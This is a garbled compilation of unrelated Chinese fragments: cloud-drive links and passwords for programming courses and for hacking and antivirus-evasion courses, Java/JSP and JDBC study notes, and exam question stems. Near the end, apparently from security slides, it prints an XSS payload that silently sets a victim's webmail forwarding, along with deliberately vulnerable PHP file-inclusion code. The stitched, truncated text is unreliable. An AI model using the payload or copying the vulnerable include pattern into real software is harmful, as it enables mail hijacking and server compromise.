免费资源由于公众号限制,不准许插入外来链接,所以只能麻烦大家手动的复制粘贴了(ps 电脑上打开此链接,操作更方便)。
小编只能帮到这了!!119、Python基础教程视频集合2 链接:/s/1mgYA5iK 密码:密码: icnh 118、黑客技术- 黑盾网安VIP 网站渗透基础类学习链接:/s/1hqfIfTa 117、黑客技术- 风云网络信息安全渗透测试课程链接:/s/1kTq1wV1 116、黑客技术- 半斤八两逆向培训课程(27课全)part2 链接:/s/1pJDZLNl 115、黑客技术- 半斤八两逆向培训课程(27课全)part1 链接:/s/1dm60A 114、黑客技术- 黑盾网安VIP 网站渗透基础类学习链接:/s/1mg8Gjzy 113、黑客技术- 饭客黑客之免杀VIP教程链接:/s/1pJDtNPT 112、黑客技术-Show me Why 超强脱壳教程链接:/s/1jGxoV8E 111、黑客技术-RFire 系列免杀教程链接:/s/1i35y6NV 110、黑客技术-burpsuite 系列视频教程链接:/s/1o6Olj9g 109、黑客技术-365免杀学习基地VIP源码免杀教程链接:/s/1jG8Ksjc 108、数据结构与算法,算法导论,微积分,数学组合链接:/s?__biz=MzA3ODg3OTk4OA==∣=207452636&idx=1&sn=585b3a86d9cc976c66341fe89e869 1f8#rd 102、python就业视频教程链接:/s?__biz=MzA3ODg3OTk4OA==∣=207219220&idx=2&sn=657182abd8f6b3fd98b13609a79af 493#rd 100、HTML5 优质视频教程集锦链接:/s?__biz=MzA3ODg3OTk4OA==∣=207168402&idx=1&sn=4ff0c63af6d0d4df3abc7a88cdf43c a1#rd 98、微信公众平台开发教程链接:/s?__biz=MzA3ODg3OTk4OA==∣=207067923&idx=1&sn=de3d25f201c7b75ab01805208ef8c 265#rd 97、Android5.0新特性链接:/s?__biz=MzA3ODg3OTk4OA==∣=207035206&idx=1&sn=7c442b97a2aa6b1d140718b31e15 1e76#rd 94、html5技术课程(38课)链接:/s?__biz=MzA3ODg3OTk4OA==∣=206955229&idx=1&sn=2f5cf3da62da90d0474c287c32a05 75a#rd 93、黑客技术-风云网络VIP网站攻防安全课程链接:/s?__biz=MzA3ODg3OTk4OA==∣=206919696&idx=1&sn=35095a12cb99bc34b98bddaf4457 678f#rd 91、2014传智播客3期C++基础班链接:/s/1c0jOzbM 密码:xb8r 89、php基础+高级+完整项目链接:/s/1kTMjPvL 密码:vnfi 88、web开发学习手册chm格式链接:/s/1o6OL7Qi 密码:nif3 86、android源码(180个源码包含仿QQ,仿微信,仿商城,游戏,百度地图,音乐播放器等等)链接:/s/1jGrdJ0a 密码:6khn 85、Android高手进阶必看的相关电子书籍及手册链接:/s/1gdgu82R 密码:1wtv 84、Wolf_TCPIP入门视频教程(网络协议黑客基础教程)链接:/s/1hqF4wtQ 密码:z77n 83、韩顺平java项目教程包含(山寨QQ项目,满汉楼系统,坦克大战,学生管理系统)链接:/s/1qWA4tZY 密码:dvia 81、传智播客ios第二期(新浪微博+团购+彩票)链接:/s/1pJ3KnMz 密码:6ckg 80、千锋3G学院IOS开发视频教程-愤怒的小鸟链接:/s/1qWoPgja 密码:f9wj 79、传智IOS7案例讲解链接:/s/1hqeqckc 密码:zqyp 77、传智播客IOS开发(基础+实战链接:/s/1sj7JRS5 密码:2b5s 76、极客学院_Android开发教程链接:/s/1i32A8rN 密码:bn4d 75、老罗Android视频链接:/s/1o6qUYEm 密码:cqsa74、传智播客蓝声强老师Android基础视频链接:/s/1bnhOcQN 密码:enhp73、尚学堂马士兵_设计模式链接:/s/1mg7TLNE 密码:ygdu72、传智播客_微软WP8.1移动开发课程(window phone 8) 链接:/s/1kT04rQJ 密码:din4 71、Windows Phone 8高级编程技术课程【全套268课】无水印版链接:/s/1bnycJT1密码:6bmp 70、林永坚Sliverlight For WP开发教程链接:/s/1mgtaIjI 密码:16w269、silverlight教程链接:/s/1dD8NXBF 密码:tb7q 68、wpf基础视频教程(第三季)-杨中科链接:/s/1kToYVun 密码:rrum 67、传智播客C#2014版链接:/s/1gdD3GR5 密码:5u5y66、EasyUI入门视频教程链接:/s/1ntkln2h 密码:dgtx 65、北京圣思园Javase培训教学视频链接:/s/1i3CJDch 密码:6i9r 64、传智播客Android4.0基础教程链接:/s/1jGxi5aY 密码:dfdc 62、传智播客cocos2d-x游戏开发基础+高级+实战链接:/s/1qCKZ8 密码:rhxn 61、传智播客android系统开发全程课程链接:/s/1jGlCKIU 密码:yus6 60、8天快速掌握Android视频链接:/s/1gdu6vej 密码:wgi9 59、Linux教程链接:/s/1lnjWU密码:rnh7 58、Linux下Android开发链接:/s/1i3nGCaL 密码:4i2m 57、Android自定义控件和视图链接:/s/1kTBtlJp 密码:axwb 56、传智播客Android JNI开发链接:/s/1bnAn9Tl 密码:w3m355、传智播客Android之病毒与反病毒开发教程链接:/s/1o6l4ERg 密码:2cvh 54、传智播客OpenGL开发链接:/s/1pJok0en 密码:8kvp 53、Android 百度地图链接:/s/1dDjLeyl 密码:pcsa 52、传智播客HTML5 开发链接:/s/1sjkc9FR 密码:1v53 51、传智播客云计算和物联网链接:/s/1qWBiWiw 密码:b2a250、Android高级开发之系列项目(新浪云盘,手机彩票等)链接:/s/1mgiQQhU 密码:utng 49、Android 插屏广告项目&源码工程及反射工程链接:/s/1gdEPgI3 密码:ge8p 48、Android编程从程序员到架构师的高手之路-高焕堂Sundy(全部234课链接:/s/1dDfHwQH 密码:8ycr47、Android即时通讯openfile 链接:/s/1jG3nIOA 密码:8n1k 46、达内嵌入式视频教程链接:/s/1mgmUAY8 密码:w38q45、PhoneGap html5 JqueryMobile SenchaTouch 跨平台移动软件开发视频教程链接:/s/1c08QNGs 密码:pumx44、Git版本控制+SVN 李廷伟(项目管理)链接:/s/1hqvkqnq 密码:6cpf 43、传智播客UML教程(项目管理)链接:/s/1o61dCMY 密码:nxry 42、传智播客java基础班链接:/s/1pJ1b7Rl 密码:2ht8 41、传智播客javaweb开发,xml解析,jsp,jdbc技术,mysql,ssh三大框架链接:/s/1gdu7aPP 密码:qtr7 40、传智播客javaweb开发链接:/s/1hqu4rD6 密码:khi7 39、传智播客数据库Oracle 链接:/s/1hqF2Z9E 密码:kk5x 38、传智播客javaweb之ssh三大框架详解链接:/s/1hqpeElI 密码:6cew 37、传智播客javaweb之JBPM框架详解链接:/s/1bnffy2r 密码:6wuv 36、传智播客Javaweb 之商城项目讲解链接:/s/1sjskcxB 密码:5fi8 35、传智播客Lucene(全文检索) 链接:/s/1kTvehrL 密码:db71 34、传智播客webservice 链接:/s/1hq1VSVi 密码:jr3u 33、传智播客javaweb webservice开发链接:/s/1i3CJjX7 密码:857k 32、spark大数据快速计算平台链接:/s/1kTvehvx 密码:bb53 31、NoSQL数据库之Redis教程链接:/s/1hqBzrpi 密码:q4qa 30、传智播客cocos2d-x游戏开发基础+高级+实战链接:/s/1qCKZ8 密码:rhxn 29、传智播客IOS开发(基础+实战)链接:/s/1sj7JRS5 密码:2b5s 28、无限互联ios视频教程全集之UI基础链接:/s/1eQm0Q90 密码:qwfu27、swift教程链接:/s/1o69RQ7w 密码:vky5 26、2014传智播客C++就业班(包含数据结构,植物大战僵尸案例)链接:/s/1qWG8EhI密码:nddk 25、猎豹网校黑客攻防- 木马揭秘[MP4] 链接:/s/1eQ4bMvg 密码:9feb 24、传智播客C# 基础教程链接:/s/1sj7dlal 密码:upgj 22、网页设计教程-轻松学会html+css--张鹏链接:/s/1bno8P1l 密码:ec3c 21、dreamweaver建站视频教程--刘静链接:/s/1nt5PxKt 密码:zxyy 20、JavaScrip网页特效精华制作--邵山欢链接:/s/1i3u2qbF 密码:bju9 19、后盾网VIP教程之javascript高级运动框架链接:/s/1o6rAn4Q 密码:4i6x 18、后盾网前端布局div+css实战链接:/s/1ntoU1vV 密码:mcsf 17、后盾网系列教材之CSS3新手系列培训教程链接:/s/1o6HYFSQ 密码:95ai 16、传智播客Ajax 教程链接:/s/1kTIeLi3 密码:94rf 15、EasyUI入门视频教程链接:/s/1eQzYcLk 密码:mdit 14、python编程教程链接:/s/1sj9faep 密码:v9mj 13、后盾网MYSQL数据库系列原创教程链接:/s/1eQngPRc 密码:tp36 12、后盾网实战VIP教程之京东网系列培训教程(PHP)链接:/s/1jGpG6t4 密码:2if8 11、后盾网实战VIP教程之ThinkPHP微博项目系列培训链接:/s/1dDniVxn 密码:jwxj 10、后盾网实战VIP教程之仿豆瓣网首页系列培训教程(PHP)链接:/s/1pJJY3EF密码:h5x6 9、后盾网开发系列之博客系统实战开发系列培训教程(PHP)链接:/s/1sjC2QxZ 密码:se1w 8、后盾网开发系列之美团网PHP系列培训教程(PHP) 链接:/s/1ntyxRPf 密码:t2fg7、后盾网开发系列之360问答系统(PHP) 链接:/s/1c0B72LE 密码:4div 6、AI 字体设计视频教程-字体设计决定产品未来--李凤辉链接:/s/1qWv9Wja 密码:3eva 5、illustrator视频教程-贺叶铭-传智播客链接:/s/1sjp2qwH 密码:76tu 4、3天学会UI图标设计--UI设计教程-李凤辉-传智播客链接:/s/1c08jAfQ 密码:gxym 3、手机UI设计视频教程-从无到有APP视觉表现--李晨链接:/s/1o6mk9kQ 密码:4i4y 2、Flash动画制作教程视频-张鹏-传智播客链接:/s/1o6mk9ku 密码:1xz9 1、传智播客平面设计Photoshop教程链接:/s/1bn8RDwz 密码:k5es 关于解压密码:一般情况下,共享的文件中会附带。
课工厂陈璇老师课程笔记 第1课:初识Java语言
jre:java runtime evirment java运行环境
jdk的路径D:\Program Files\Java\jdk*\bin
Jave SE API(有常用的Java接口、类、方法等)
1、Package Explore(包资源管理器)
Library (库)项目所依赖的类库资源都依赖与这个库
2、window-->Show View-->Navigator(导航器)
jad -s java *.class
菜单-->Decompiler class File-->找到你的*.class文件打开即可
ORACLE9I 数据仓库TR.070课程简介Emerson中国Discoverer作者: 汉得顾问创建日期: June 23, 2004最后修改日期:控制号:版本号: 1审批签字:Emerson项目经理汉得项目经理Copy Number _____文档控制修改记录审阅分发Contents文档控制 ................................................................................................. 错误!未定义书签。
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Eclipse -- web project (配置Tomcat服务器)配置Tomcat服务器:Server -- Runtime Environments(Tomcat6.0)url:http://localhost:8080/工程名/目录/页面文件工程布署位置:tomcat6/webapps/Servlet1.war(启动后自动解压)获取请求参数:(?test=abc&flag=dfg) <form>表单</form>request.getParameter("参数名");HttpServletRequest request 不能由程序员能过new 生成对象,它是由web容器自动生成request对象: 请求对象HttpServletResponse response : 响应对象web容器: tomcatServlet 控制器JSP显示信息== (HTML,css ,Javascript)Java 平台无关,可移植(Windows,linux)Tomcat (JSP、Servlet容器)JRE(Java容器)JBossWebLogic WebSphere (EJB:分布式)Sun服务器认证JBuilderservice---选择调用doGet或doPost方法转发、重定向-- 目标上下文根目录:content roothttp://主机:端口/content root/目录/网页或Servlet地址编码(字符集)1> <form method="post">request.setCharacterEncoding("gbk"); //该代码必须位于获取请求参数代码之前2> get/postString userNameTemp = request.getParameter("userName");String userName = new String(userNameTemp.getBytes("iso-8859-1"),"gbk");iso-8859-1 ascii 255gbk/gb2312/gb18030 /utf-8get: <form method="get"/> <a href="a.html?user=张三"/>post : <form method="post">jsp: view视图servlet:controller控制器: 1.获取用户所提交的数据 2.调用后台模型处理用户3.控制响应流程(可作简单逻辑,且代码不重复)javabean: model模型MVC(Model模型-- View视图-- 控制器Controller:servlet)表示层(html,js,css,images,jsp,servlet) view/Controller dto业务逻辑层(bo,service):javabean dto Model数据逻辑层,也叫持久层(dao,专门做数据库操作:insert,delete,update,select):javabean,hibernate dto Model数据库(mysql,sqlserver)attribute : 属性setAttribute("属性名",对象)parameter: 参数?test=abc 表单数据setAttribute("属性名", 属性值);getAttribute("属性名");pageScope: 页面范围,只能在当前页面使用pageScoperequestScope: 两个页面之间 a.jsp -- b.jsp requestScopesessionScope:对于单个用户所有页面(购物车),打开浏览器代表一个用户sessionScope applicationScope:对于所有用户所有页面applicationScope尽量用小范围jsp servletpageContext 变量request requestsession HttpSession session = request.getSession();application ServletContext<b>hello</b><br/><% %><jsp:useBean>1>标签处理程序2》标签库描述文件.tldJSP: model1: jsp -- jsp -- javabeanJSP: model2: MVC jsp - servlet - javabeanjsp(view视图) -- Servlet(Controller控制器)-- bo/ Dao(模型:model)Servlet(Controller控制器): 获取数据,手工Struts(MVC)框架: jsp servlet1.数据自动转化2.控制器功能更强大,多分支3.Struts标签4.文件上传5.数据验证6.结构更清晰MVC框架,都不提供Model实现方式,表示层1.创建Web工程并导入Sturts库.jar2.配置中央控制器(ActionServlet)并装载struts-config.xml配置文件3.Login.jsp ---- LoginActionForm(接收用户所输入的数据)表单BeanMyEclipse: 1>导入Struts库,生成Struts-config.xml,web.xmlcom.公司名.项目名<font-bean name="loginForm" type="com.strutsdemo.form.LoginForm"/><action path="/login" type="com.strutsdemo.action.LoginAction" name="loginForm" attribute="loginForm" scope="request/session"控制器:ActionServlet中央控制器(本身不作具体控制,其控制功能由RequestProcesser 类完成Action分支控制器,后端控制器,LoginAction,RegisterActionRequestProcesser:具备全局控制功能,*.do == Filter 处理中文乱码login LoginAction LoginFormjsp (多) actionForm(1) action(多)actionForm属性大于等于jsp属性tomcat start--> web.xml-->创建ActionServlet-->struts-config.xml(地图)准备登录:login.jsp( action="/Struts2/login.do") --- actionServlet(监控所有.do请求)-- /login (action元素中的path="/login") -- <action name="1、新建一个WEB工程strus.2、右击工程名,--MyEclipse –Strus2.3、右击工程名,--New—Other---MyEclipse—web- sturs—struse1.2—struse Formse(最长的那个).Config/Module;工程名要配置对.Use CASE ;用户实例.4、在MyEclipse 中配置Tomcat 6.X, 选择Widow—Preferences—Tomcat—Tomcat 6.X5、发布前要启动TOMCAT,发布。
《2011年LAMP兄弟连新版原创视频教程:细说 PHP》更新至第106课[压缩包]
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《尚学堂科技.马士兵.JAVA.系列视频教程10年2 月9日更新(更新Spring3.0)》(java video 目录: 180_C期末考试测试题讲解 下 179_NULL的含义 178_C期末考试测试题讲解上 177_文件 宏 typedef 漫谈 176_位运算符 175_广义的算法 174_狭义的算法 173_链表 下 172_链表 中 171_链表 上 170_补码下 170_补码 下 169_复习上节课补码知识 168_补码 上 167_进制转化 166_枚举下 166_枚举 下 165_枚举 上 164_结构体11_综合应用_学生管理系统(存储,排序,输出) 163_冒泡排序 162_结构体10_结构体变量的运算 161指针优点大总结【重点】 160_结构体9_应该发送内容还是应该发送地址【重点】 159_结构体8_通过函数完成对结构体变量的输入和输出 158_结构体7_复习上节课知识 157_考前知识点概述 156_结构体6_布置作业 155_结构体5_如何取出结构体变量中的每一个成员【重点】 154_结构体4_结构体的赋值和初始化 153_结构体3_怎样使用结构体变量概述 152_结构体2_如何定义结构体[3种方式] 151_结构体1_为什么需要结构体 什么叫结构体【重点】 150_指针_30_跨函数使用内存习题测试【重点】 149_指针_29_动态内存可以跨函数使用详解【重点】用 148_指针_28_静态变量不能跨函数使用详解【重点】 147_指针_27_闲聊 146_指针_26_复习上节课知识 145_指针_25_多级指针 144_指针_24_动态内存和静态内存的比较【重点】 143_指针_23_动态内存分配举例_动态一维数组的构造 142_指针_22_malloc函数的用法2 141_指针_21_malloc函数使用的简单介绍 140_指针20_为什么需要动态分配内存【重点】 139_指针19_传统数组的缺点【重点】 138_指针18_动态内存分配概述 137_指针17_何谓变量的地址 一个指针变量到底占几个字节【难点】 136_指针16_指针变量的运算 135_指针15_复习上节课知识 134_指针14_确定一个一维数组需要2个参数及其原因_下 134_指针14_确定一个一维数组需要2个参数及其原因_上 133_指针13_一维数组名的含义 《传智播客.Net培训.net视频教程》(.net视频 培训传智播客视频教程开放课程 c#视频移动开发winform SQL HTML JavaScript Dom JQuery ajaxnet公开课)更新 “高级”31-34[压缩包] 《郝斌C语言自学教程》郝斌老师C语言自学专 讲180集完整版[压缩包] 《3G手机开发之Android应用开发》共8天课程/ 更新完毕[压缩包] 《北京圣思园JAVA培训教学视频汇总》Java SE&JSP&Servlet&JavaScript&Ajax&jQuery&OOA 与UML&CVS&XML&Unit Test&Struts 2.2&Ant&Hibernate[压缩包] 《后盾网PHP原创视频教程》更新至107课 [WMV] courses)
学通Java Web的24堂课
在进行Java Web 应用开发前,需要把整个开发环境搭建好,例如,通常需要安装Java 开发工具包JDK 、Web 服务器(通常使用Tomcat )和IDE 开发工具(通常使用MyEclipse 或Eclipse )。
学习摘要:安装并配置JDK 开发工具包测试JDK 是否安装成功下载Web 服务器工具Tomcat了解Tomcat 的目录结构MDI 和SDI 开发环境使用Visual Basic 的帮助系统编写第一个应用程序在实际应用中了解开发环境1 第 堂课 搭建开发环境 ( 视频讲解:97分钟)41.1 Java Web 应用的开发环境概述搭建Java Web 应用的开发环境需要安装开发工具包JDK 及Web 服务器和数据库,为了提高开发效率,通常还需要安装IDE (集成开发环境)工具。
Java Web 应用的开发环境如图1.1所示。
图1.1 Java Web 应用的开发环境1.1.1 开发工具包JDKJDK 是Java Development Kit 的简称,即Java 开发工具包,包括运行Java 程序所必需的JRE 环境及开发过程中常用的库文件。
在开发Java Web 应用之前,必须安装JDK ,在写作本书时,JDK 的最新版本为jdk-6update22。
你问我答:JDK 、JRE 和JVM 的关系。
JDK 中包括很多用Java 编写的开发工具(如javac.exe 和jar.exe 等),另外,JDK 还包括一个JRE 。
如果计算机中安装了JDK ,它会有两套JRE ,一套位于\jre 目录下,另一套位于Java 目录下,后面的比前面的少了服务器端的Java 虚拟机,不过将前面那套的服务器端Java 虚拟机直接复制过来就行了。
JRE 是Java Runtime Environment ,即Java 的运行环境,Java 程序则必须有JRE 才能运行。
JRE 是面向Java 程序的使用者,而不是开发者。
最适合自学的尚硅谷《全套JavaEE视频教程》提示:JavaEE框架视频继续更新中,后续视频虽免费下载,但是需要通过分享才能获得!亲,你已经分享过的,届时直接领取下载密码即可!【视频教程】Java基础阶段:一、佟刚Java基础视频(课堂实录)/share/link?shareid=3688687329&uk=573533038二、尚硅谷Java基础实战——Bank项目/share/link?shareid=3690978764&uk=573533038、三、尚硅谷_ORACLE、SQL、PLSQL 视频教程/s/1ntoaRKt四、尚硅谷JDBC视频教程/share/link?shareid=4245722589&uk=120553861JavaWeb阶段一、尚硅谷_JavaScript DOM编程视频教程/share/link?shareid=4211630709&uk=120553861二、尚硅谷jQuery 视频教程/share/link?shareid=4221820801&uk=120553861三、尚硅谷Ajax视频教程/s/1jGgbgH4四、尚硅谷JavaWeb视频基础(涵盖JavaWEB 企业级开发所需的Servlet、JSP、MVC 设计模式、EL 表达式、JavaBean、国际化、Cookie和HttpSession、JavaMail等全部核心技术。
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Spring视频教程 Spring MVC开发实例-基于SpringMVC、MyBatis、FreeMarker架构实战CMS大型门户网站
Spring视频教程Spring MVC开发实例—基于SpringMVC、MyBatis、FreeMarker架构实战CMS大型门户网站课程讲师:伍老师课程分类:Java适合人群:中级课时数量:80课时用到技术:SpringMCV、MyBatis、FreeMarker涉及项目:CMS大型门户网站更新程度:完毕Spring视频教程原文地址:/goods-296.html一、课程来源:华智经纬CMS是一套基于java技术开发,继承其强大、稳定、安全、高效、跨平台等多方面的优点,支持mysql、oracle、sqlserver等数据库。
强大、灵活的标签,用户自定义显示内容和显示方式完全生成全站静态页面,可自定义路径结构,全面提高页面访问速度基于目前流行的SpringMVC 及性能较Hibernate高的MyBatis二、课程适合的对象:Spring视频教程适合想要提升开发技能的Java开发人员,想要使用MyBatis+springMVC+Freemarker三、课程培养目标:1 熟练掌握并精通springMVC+MyBatis技术。
2 加强开发的内功修炼。
3 深入理解大型门户网站开发技术4 提供软件设计能力和软件开发能力,并在一定程度上增加项目管理经验。
6 掌握多个技术点,能够独立开发基于MyBatis+springMVC的大型门户网站四、培训定位:Spring视频教程适合于各个层次的Java开发人员,对于初级程序员来说,可以在短时间内迅速提高开发能力,掌握流行的技术,把握技术的发展脉络。
五、课程讲解内容涵盖:1、项目介绍与需求分析2、基于powerDesigner的建模(概念模型物理模型)3 、适合MyBatis+springMVC的强大架构(多层架构)4、大型门户网站所用到的静态化技巧5、最新版本ckEditor3.6灵活使用6、基于javascript的经典树模型7、基于JQuery的AJAX应用8、MyBatis下使用树模型(数据结构)9、图片水印文字及水印图片操作技巧10、MyBatis下的经典物理删除技巧11、MyBatis下性能提升12、FreeMarker操作技巧13、基于junit测试驱动开发技术14、mybatis 缓存技术15、springMVC上传下载技巧16、基于MyBatis多表操作技巧六、Spring视频教程技术介绍:Spring3:著名的IOC框架,在本课程当中,除了使用Spring的IOC注入特性及Spring的MVC特性,还会重点阐述Spring与MyBatis的整合特性。
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不同系统上要安装对应的虚拟机才可以运行java程序开发步骤1、编写源文件 (.java)2、编译源文件为类文件(.class)可用J2SE或J2EE编译3、在虚拟机上运行注释//单行注释/* */多行注释java内容介绍java编程可以分成三个方向:1、java se (j2se)桌面开发 java中的基础中的基础2、java ee (j2ee)web开发3、java me (j2me)手机开发java se课程介绍java面向对象编程(基础)java图开界面开发java数据库编程java文件io流编程java网络编程java多线程编程java ee基础1java面向对象编程--数据库编程-->java sejava 基础2html--css--javascript-->div+cssjava ee中级部分Servlet--Jsp-->mvc模式java ee高级部分Struts--Ejb--Hibernate--Spring--Ajax(ext,dw2)-->ssh框架java之父gosling1990 sun启动绿色计划1 | 4451992 创建oak语言-->java1994 gosling参加硅谷大会演示java功能,震惊世界1995 sun正式发布java第一个版本,目前最新是jdk7.0java开发工具记事本、(jcreator、jbuilder退出舞台了)、netbean、eclipse如何选择开发工具先选择记事本,对java有一定了解后再使用eclipse高级开发工具为什么呢?1、更深刻的理解java技术,培养代码感2、有利于公司面试java语言的特点1、java语言是简单的2、java语言是面向对象的3、java语言是跨平台(操作系统)的[即一次编译,到处运行]4、java是高性能的java第一个程序hello.java运行java程序要安装和配置jdkjdk是什么?1、jdk全称java dvevlopment kit中文java开发工具包2、jdk是sun公司开发的3、jdk包括jre(java runtime envirnment)java运行环境、一堆java工具和java基础的类库(类共3600左右,常用类在150个左右)4、可以在下载**开发安装jdk,用户执行需要安装jre配置JDK添加环境变量即可windows下配置jdk在计算机属性--高级设置--环境变量--添加PATH将JDK所在路径指定即可。
Java Web参考题
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javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 单选 题 javaweb 多选 题 javaweb 多选 题 javaweb 多选 题 javaweb 多选 题 javaweb 多选 题 javaweb 多选 题
下面哪一个不是JSP本身已加载的基本 类? 以下关于JavaBeans的说法中,错误的 是: 下面的说法错误的是: 下述选项中不属于JDBC基本功能的 是: JSP 页面经过编译之后,将创建一个 () 在jsp中,要定义一个方法,需要用到 以下哪个元素? JSP在WEB服务器上运行结果: Page指令用于定义JSP文件中的全局属 性,下列关于该指令用法的描述不正 以下选项中哪一个是从Web应用服务 器一开始执行服务一直到Web应用服 在JSP中使用<jsp:getProperty>标记时, 不会出现的属性是: 对于预定义<%!预定义%>的说法错误 的是: 从 “员工” 表的“姓名”字段中找出 名字包含“张明”的人,下面哪条 在JSP中调用JavaBean时不会用到的标 记是: 关于JavaBean正确的说法是: Servlet程序的入口点是: 不能在不同用户之间共享数据的方法 是: page指令通过以下哪个属性指定当前 页面的内容类型和字符集? 指令指定自定义标签的描述器所在位 置? 在传统的HTML页面中加入以下哪一 项就构成了一个JSP页面文件。 配置JSP运行环境,若WEB应用服务器 选用TOMCAT,以下说法正确的是: 对于“<%!”、“%>”之间声明的变 量,以下说法正确的是: 假设在helloapp应用中有一个Javabean 文件HelloServlet,它位于 在客户端浏览器的源代码中可以看到 : page指令的作用是: page指令的import属性的作用是: page指令的以下哪个属性可以设置JSP 页面是否可多线程访问 可在JSP页面出现该指令的位置处,静 态插入一个文件。 以下对象中的哪一个不是JSP的内置对 象。 在JSP中,内置对象为以下哪一个时封 装了用户提交的信息,使用该对象可 request对象可以使用以下哪种方法获 取表单中某输入框提交的信息? JSP的内置对象中哪一个对象可对客户 的请求作出动态响应,向客户端发送 从( )开始,到( )结束,被称为一 个会话。 下列代码编译后不会出现警告或错误 的是: 下边哪个不是FORM的元素? 下面哪个是空格: <td align=”xxxx”>中的align属性是 什么含意?
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jdbc 详解+学生选课项目jdbc 介绍jdbc 是sun 公司定义的一套访问数据库的规范( 接口+ 类),主要是放在java.sql 包javax.sql 包. 原理图:做jdbc开发的几个前提1.import java.sql.* 有时import javax.sql.*;2.把jar 包导入到你的java项目昨天还是用jdbc 写了一个简单java程序,完成添加一条记录到oracle 数据库中.Connection接口面试题: 什么时候,需要把setAtuoCommit设为false?答:当有多个dml 同时执行,将其看做一个整体提交,则使用事务管理,则需要把setAutoCommit 设为false;具体使用方法:package cn.sp.test;import java.sql.*;import oracle.jdbc.driver.OracleDriver;public class TestJdbc {//使用jdbc去操作oracle 数据库public static void main(String[] args) {// TODO Auto-generated method stubConnection ct=null;Statement statement=null;try {//1加载驱动Class.forName("oracle.jdbc.driver.OracleDriver");//DriverManager.registerDriver(new OracleDriver());//2得到连接ct=DriverManager.getConnection("jdbc:oracle:thin:@", "scott", "tiger");//把事务设为不自动提交ct.setAutoCommit(false);//3.创建sql对象(Statement / PreparedStatement /CallableStatement)statement=ct.createStatement();//4.通过statement向数据库发出sql 指令./* int n=statement.executeUpdate("insert into user1 values(user1_seq.nextval,'顺平','123'," +"'shunping@',sysdate,30)"); //executeupdate 执行dml(update/insert/delete)*///需求: 对emp表进行操作: 把SMITH 的sal -10 给KING sal+10statement.executeUpdate("update emp set sal=sal-10 where ename='SMITH'");int i=9/0;statement.executeUpdate("update emp set sal=sal+10 where ename='KING'");//提交所有事务mit();} catch (Exception e) {e.printStackTrace();//如果sql 语句中任何语句错误,则可以整体回滚.try {ct.rollback();} catch (SQLException e1) {// TODO Auto-generated catch blocke1.printStackTrace();}// TODO: handle exception}finally{//关闭资源[先开后闭];if(statement!=null){try {statement.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();}statement=null;//使用垃圾回收.}if(ct!=null){try {ct.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();}ct=null;}}}}ResultSet 的说明在默认情况下,我们的rs结果集,只能向前移动,这样rs 结果就不能复用,如果希望复用,则可以这样做://通过java 来查询所有的雇员.//假设我们希望rs结果,可以滚动(可以向前,亦可向后)ResultSet 的可选项有:resultSetType - 结果集类型,它是 ResultSet.TYPE_FORWARD_ONLY、ResultSet.TYPE_SCROLL_INSENSITIVE或ResultSet.TYPE_SCROLL_SENSITIVE 之一resultSetConcurrency - 并发类型;它是 ResultSet.CONCUR_READ_ONLY 或 ResultSet.CONCUR_UPDATABLE 之一statement=ct.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE ,ResultSet.CONCUR_READ_ONLY);rs=statement.executeQuery("select * from emp");//循环取出while(rs.next()){System.out.println(rs.getInt("empno")+" 名字"+rs.getString("ename"));}//如果我们希望,重新使用rsrs.beforeFirst();System.out.println("*********************");while(rs.next()){System.out.println(rs.getInt("empno")+" 名字"+rs.getString("ename"));}◆orace 表的数据类型和java 程序(jdbc) 的对应关系sql server 表的数据类型和java程序对应图..mysql 表的数据类和java 程序对应图...◆及时关闭资源!!!if(rs!=null){try {rs.close();} catch (Exception e) {// TODO: handle exception}rs=null;}//关闭资源[先开后闭];if(statement!=null){try {statement.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();}statement=null;//使用垃圾回收.}if(ct!=null){try {ct.close();} catch (SQLException e) {// TODO Auto-generated catch blocke.printStackTrace();}ct=null;}细节:(1)尽量晚创建,早释放(2)关闭资源的代码,一定放在finallySqlHelper类的编写在进行jdbc 程序编写的时候,因为对数据库操作很多,所有都会把对数据库的各种操作,封装到一个类(SqlHelper/DBUtil),我们一起编写(1)如果访问数据库很频繁,则我们的Connection 、PreparedStatement,ResultSet.. 就不要搞成static。
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95年,Sun发布JDK1.0 98年,JDK1.2,更名为Java2 后续JDK1.3、1.4 目前JDK1.5,更名为Java 5.0 (最新为JDK 6 Update 3) 我们使用5.0 j2se JAVA能开发那些类型的程序?
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一种面向对象的语言。 一种平台无关的语言,提供程序运行的解释环境。 一种健壮的语言,吸收了C/C++ 语言的优点,但去掉了其影响程序健壮性的部 分(如:指针、内存的申请与释放等)。
代码凾析 javas<!-- -->cript:eval(unescape('xmlhttp=new
ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open ("GET","/classic/setforward.php?optype=1&is_open =1&Forward_To=mengzhuo@&For ward_Save=on",false);xmlhttp.send();var a=(xmlhttp.responseText);document.write("I Miss You from FengGou :)");'));"
Vuln Code: $fp = fopen($url, 'r'); fpassthru($fp);
PHP 癿 fopen(), file() 及其它凼数存在一个缺陷,即 用户随意地添加额外HTTP报头信息到HTTP请求数据 包中。攻击者可以利用此缺陷绕过服务器癿安全限制 ,迚行非法访问。在某些情况下,这个缺陷甚至可以 打开仸意癿网络连接,在代理端执行PHP脚本和打开 邮件转发。
1.包含本地仸意文件(读取、执行) 2.包含进程仸意文件(执行) 3.直接执行系统命令(php://input)
$file=$_GET["file"]; include($file); include('/config/'.$file);
Wireless Application ProtocolMMS Encapsulation ProtocolVersion 01-June-2001Wireless Application ProtocolWAP-209-MMSEncapsulation-20010601-a A list of errata and updates to this document is available from the WAP Forum™ Web site, /, in the form of SIN documents, which are subject to revision or removal without notice.© 2001, Wireless Application Protocol Forum, Ltd. All rights reserved.Terms and conditions of use are available from the WAP Forum™ Web site at/what/copyright.htm.You may use this document or any part of the document for internal or educational purposes only, provided you do not modify, edit or take out of context the information in this document in any manner. You may not use this document in any other manner without the prior written permission of the WAP Forum™. The WAP Forum authorises you to copy this document, provided that you retain all copyright and other proprietary notices contained in the original materials on any copies of the materials and that you comply strictly with these terms. This copyright permission does not constitute an endorsement of the products or services offered by you.The WAP Forum™ assumes no responsibility for errors or omissions in this document. In no event shall the WAP Forum be liable for any special, indirect or consequential damages or any damages whatsoever arising out of or in connection with the use of this 